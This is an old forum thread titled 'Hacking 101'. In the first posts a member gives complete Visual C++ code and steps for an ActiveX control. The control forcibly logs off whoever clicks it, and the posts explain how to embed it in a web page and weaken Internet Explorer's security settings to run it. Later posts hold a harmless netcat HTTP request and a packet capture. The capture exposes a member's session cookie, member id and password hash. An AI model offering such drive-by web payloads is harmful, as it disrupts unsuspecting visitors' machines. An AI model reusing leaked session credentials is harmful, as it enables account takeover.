Jump to content


Photo

H A C K I N G 1 0 1


  • Please log in to reply
13 replies to this topic

#1 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 16 August 2004 - 07:13 PM

After all what hacker wannabes were looking for, a hacking topic where everyone shares tricks and links ( for resources ) how to H A C K !!!!!!

Building OCX ( ActiveX control ) to HACK/CRACK user's computer

You need Visual C++ v6.0 to build ocx ( ActiveX control ), Go File - New- New projects - click on MFC ActiveX Control Wizard( Actually ATL control is better, smaller size, for simplicity lets just pick MFC for now). Give Project Name XCtrl or whatever, on location, give location. On Next screen, click on Next, on next screen , click on Advanced, and under 'Advanced ActiveX Features', click on Flicker-free activation. Click on Ok and Finish.

Visual C++ will create files for u, open file name XCtrlCtl.cpp ( assuming u used project name XCtrl ), edit function void XCtrlCtrl::OnDraw( CDC* pdc, const CRect& rcBounds, const CRect& rcInvalid ){
//This is where u are drawing ur control.
pdc->FillRect(rcBounds, CBrush::FromHandle((HBRUSH)GetStockObject(WHITE_BRUSH)));
pdc->SelectObject( (HBRUSH)GetStockObject(WHITE_BRUSH));
RECT rect;
rect.left = rcBounds.left;
rect.top = rcBounds.top;
rect.right = rcBounds.left + rcBounds.Width();
rect.bottom = rcBounds.top + rcBounds.Height();
pdc->DrawText("Do not click me!!",&rect, DT_SINGLELINE );
}

Edited by rs_1915, 16 August 2004 - 07:14 PM.

:)

#2 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 16 August 2004 - 07:22 PM

Now go to View- Class Wizard, Message Maps, where all the Messages are, select on WM_LBUTTONDOWN, then click on Add Function and the Edit code, VC++ will create the code to add Left button click even handler,,and u will be forwarded to the code, edit the code to look like this..
void CXctrlCtrl::OnLButtonDown(UINT nFlags, CPoint point)
{
// TODO: Add your message handler code here and/or call default
::ExitWindowsEx( EWX_LOGOFF|EWX_FORCE , NULL );

COleControl::OnLButtonDown(nFlags, point);
}


That is it..go to build, and click on Build all.. You will have your own ActiveX control. XCTRL.ocx file. VC++ will register the ocx for u. In order for it to run, it has to be registered in Registry.

One more thing,, go to xctrl.odl file ( there should be one) and copy the UUID, go to last section of the page,,,where u can see something like this...
// Class information for CXctrlCtrl

[ uuid(CEA22AE8-9891-4451-8764-3445260CF139),
helpstring("Xctrl Control"), control ]
coclass Xctrl
{
[default] dispinterface _DXctrl;
[default, source] dispinterface _DXctrlEvents;
};
CEA22AE8-9891-4451-8764-3445260CF139 This is the UUID of the control, make note of it , u will need that in ur webpage.




:)

#3 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 16 August 2004 - 07:27 PM

Ok now webpage side,
create one small webpage ( for demonstration)

<html>
<head></head>
<body>
Test
</body>
</html>

now add this line to ur webpage,

<OBJECT id=xctrl classid="CLSID:CEA22AE8-9891-4451-8764-3445260CF139" CODEBASE="xctrl.ocx"></OBJECT>

That is it, run this page in ur webbrowser, actually before u run it, make sure ur browser supports running ActiveX control. Go to IE, tools, internet option, security, custom level, Enable Download unsigned ActiveX control.
Now u r good to go..Test it by clicking on 'Do on click me' smile.gif

Edited by rs_1915, 16 August 2004 - 07:30 PM.

:)

#4 Limitation//Moon

Limitation//Moon

    Advanced Honourable Member

  • National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 17 August 2004 - 05:19 AM

You are one step ahead of me rs, If i will say anything you will beat me to it..LOL

However, I am not surprised by your pressure on ActiveX, since you wrote that software. Well, security come in a price.

Good one... Give us phew more.

Edited by rajunpl, 17 August 2004 - 05:19 AM.


#5 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 17 August 2004 - 07:27 PM

QUOTE(rajunpl @ Aug 17 2004, 05:19 AM)
You are one step ahead of me rs, If i will say anything you will beat me to it..LOL


hehe...no , i am not competing!!! I guess we need to start one thread and move all the Hacking tricks to it !!!!

Guess what!! i have a Toshiba e740 PDA ( Pocket PC) which has a built in Wireless card. Last night i connected it to my network, and hola!! i could surf internet on that tiny machine!!! Actually i logged in to this forum for a sec, it is just little hard to type with that stylus.


:)

#6 Limitation//Moon

Limitation//Moon

    Advanced Honourable Member

  • National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 19 August 2004 - 04:38 PM

okay rs out of the blue,

lemme give you genuine code,

code:--------------------------------------------------------------------------------
E:\WINNT>nc www.google.com 80
GET / HTTP/1.1
HOST:www.google.com

HTTP/1.1 200 OK
Date: Thu, 10 Oct 2002 20:50:29 GMT
Content-Length: 2532
Content-Type: text/html
Cache-Control: private
Server: GWS/2.0
..Truncated...
--------------------------------------------------------------------------------

#7 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 19 August 2004 - 05:28 PM

cool!! i will try it smile.gif btw did u download and try my software smile.gif
:)

#8 linuxuser

linuxuser

    Honourable Member

  • WNSO Addict
  • PipPipPipPip
  • 1,147 posts

Posted 20 August 2004 - 02:37 PM

lets forget about politics crap ,,,and now lets talk about some Tech stuff smile.gifsmile.gif
Rapunjl,,what is cooking??!!!! biggrin.gif biggrin.gif
:)

#9 Limitation//Moon

Limitation//Moon

    Advanced Honourable Member

  • National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 21 August 2004 - 05:07 AM

Lol, First thing came on my mind was ..cooking with Jira, khursani,aduwa ,tomatoes and dhaniya..

Now I realise what you really mean, You mean cookies. Google is good because he sends cookies without any perception of the end user, but really scary.

Secondly, Whole world relies on cookies starting from wnso forum to the sherman's network (kaZaa)

So What more could I say you about the magic of text file? I know you may surprise me by writing one.Now again You might be wanting to know what really cookies does on hacking,as you already seems to be interested at. I have no evidence about that neither want any laugh.gif laugh.gif

Good start though,



#10 Limitation//Moon

Limitation//Moon

    Advanced Honourable Member

  • National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 28 August 2004 - 11:22 PM

Lol...forget about hacking,even when I was analysing the packets of downstream from wnso..LOL..I got this

GET /forums/ HTTP/1.1
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: chautari.wnso.org
Connection: Keep-Alive
Cookie: wnso_forum_read=a%3A18%3A%7Bi%3A22%3Bi%3A1093710693%3Bi%3A13%3Bi%3A1093670101%3Bi%3A9%3Bi%3A1093670030%3Bi%3A16%3Bi%3A1093460894%3Bi%3A21%3Bi%3A1093094838%3Bi%3A41%3Bi%3A1092845621%3Bi%3A18%3Bi%3A1093461517%3Bi%3A14%3Bi%3A1092257643%3Bi%3A4%3Bi%3A1091299202%3Bi%3A10%3Bi%3A1091392769%3Bi%3A7%3Bi%3A1093709706%3Bi%3A19%3Bi%3A1093461538%3Bi%3A12%3Bi%3A1092929779%3Bi%3A55%3Bi%3A1092748867%3Bi%3A6%3Bi%3A1092718494%3Bi%3A43%3Bi%3A1093582843%3Bi%3A32%3Bi%3A1093461326%3Bi%3A5%3Bi%3A1093460829%3B%7D; bbmode=ezmode; wnso_anonlogin=-1; wnso_member_id=995; wnso_pass_hash=ab37ec7b5b317485c7ddfe1b3635bb68

..ɔ...U.h
3Sk4o..w$F.(....$-..@=.Rj.8(3..q.Bb.sD._EFwu..%.Fo.*.7...}c"`R..bL...CT.!.).{8^]z.f&7bX&'B^b.|.g.o;u.ATY..C..P~..~..1.............'`_...
0

GET /forums/style_images/1/tile_back.gif HTTP/1.1
Accept: */*
Referer: http://chautari.wnso.org/forums/
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 02 Aug 2004 22:48:03 GMT
If-None-Match: "dbc2ba-1e8-410ec4a3"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: chautari.wnso.org
Connection: Keep-Alive
Cookie: wnso_forum_read=a%3A18%3A%7Bi%3A22%3Bi%3A1093710693%3Bi%3A13%3Bi%3A1093670101%3Bi%3A9%3Bi%3A1093670030%3Bi%3A16%3Bi%3A1093460894%3Bi%3A21%3Bi%3A1093094838%3Bi%3A41%3Bi%3A1092845621%3Bi%3A18%3Bi%3A1093461517%3Bi%3A14%3Bi%3A1092257643%3Bi%3A4%3Bi%3A1091299202%3Bi%3A10%3Bi%3A1091392769%3Bi%3A7%3Bi%3A1093709706%3Bi%3A19%3Bi%3A1093461538%3Bi%3A12%3Bi%3A1092929779%3Bi%3A55%3Bi%3A1092748867%3Bi%3A6%3Bi%3A1092718494%3Bi%3A43%3Bi%3A1093582843%3Bi%3A32%3Bi%3A1093461326%3Bi%3A5%3Bi%3A1093460829%3B%7D; bbmode=ezmode; wnso_anonlogin=-1; wnso_member_id=995; wnso_pass_hash=ab37ec7b5b317485c7ddfe1b3635bb68; wnso_session_id=3a70d2b767e306c4b4bf49ddab6117a4

HTTP/1.1 304 Not Modified
Date: Sat, 28 Aug 2004 16:38:04 GMT
Server: Apache/1.3.29 Ben-SSL/1.53 (Unix) FrontPage/5.0.2.2510 PHP/4.3.2 mod_jk/1.2.2
Connection: Keep-Alive
Keep-Alive: timeout=15, max=99
ETag: "dbc2ba-1e8-410ec4a3"

GET /forums/style_images/1/logo4.gif HTTP/1.1
Accept: */*
Referer: http://chautari.wnso.org/forums/
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 02 Aug 2004 23:09:30 GMT
If-None-Match: "dbc287-186f-410ec9aa"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: chautari.wnso.org
Connection: Keep-Alive
Cookie: wnso_forum_read=a%3A18%3A%7Bi%3A22%3Bi%3A1093710693%3Bi%3A13%3Bi%3A1093670101%3Bi%3A9%3Bi%3A1093670030%3Bi%3A16%3Bi%3A1093460894%3Bi%3A21%3Bi%3A1093094838%3Bi%3A41%3Bi%3A1092845621%3Bi%3A18%3Bi%3A1093461517%3Bi%3A14%3Bi%3A1092257643%3Bi%3A4%3Bi%3A1091299202%3Bi%3A10%3Bi%3A1091392769%3Bi%3A7%3Bi%3A1093709706%3Bi%3A19%3Bi%3A1093461538%3Bi%3A12%3Bi%3A1092929779%3Bi%3A55%3Bi%3A1092748867%3Bi%3A6%3Bi%3A1092718494%3Bi%3A43%3Bi%3A1093582843%3Bi%3A32%3Bi%3A1093461326%3Bi%3A5%3Bi%3A1093460829%3B%7D; bbmode=ezmode; wnso_anonlogin=-1; wnso_member_id=995; wnso_pass_hash=ab37ec7b5b317485c7ddfe1b3635bb68; wnso_session_id=3a70d2b767e306c4b4bf49ddab6117a4





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users